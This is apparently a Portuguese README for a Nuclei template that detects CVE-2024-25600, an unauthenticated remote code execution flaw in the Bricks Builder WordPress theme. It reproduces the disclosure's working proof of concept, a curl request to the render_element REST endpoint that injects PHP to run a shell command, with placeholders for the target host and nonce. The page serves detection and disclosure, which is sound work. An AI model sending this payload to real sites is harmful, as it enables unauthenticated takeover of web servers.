
Modelo Nuclei e informações sobre o POC para CVE-2024-25600
Modelo Nuclei e informações sobre o POC para CVE-2024-25600
O tema Bricks para WordPress é vulnerável a Execução Remota de Código em todas as versões até, e incluindo, 1.9.6. Isso torna possível que atacantes não autenticados executem código no servidor. Este modelo 🛠️ foi projetado para detectar a vulnerabilidade CVE-2024-25600 🕳️ encontrada no plugin Bricks Builder para WordPress usando nuclei. A vulnerabilidade permite execução remota de código não autenticada em sites afetados 💻.
O POC completo (automático) está disponível em https://github.com/chocapikk/CVE-2024-25600.
O PoC base fornecido pela divulgação é o seguinte:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}'
Substitua [HOST] pelo site alvo e [NONCE] pelo valor nonce obtido do site.
Para mais informações sobre a vulnerabilidade CVE-2024-25600, consulte a divulgação detalhada em Snicco.io.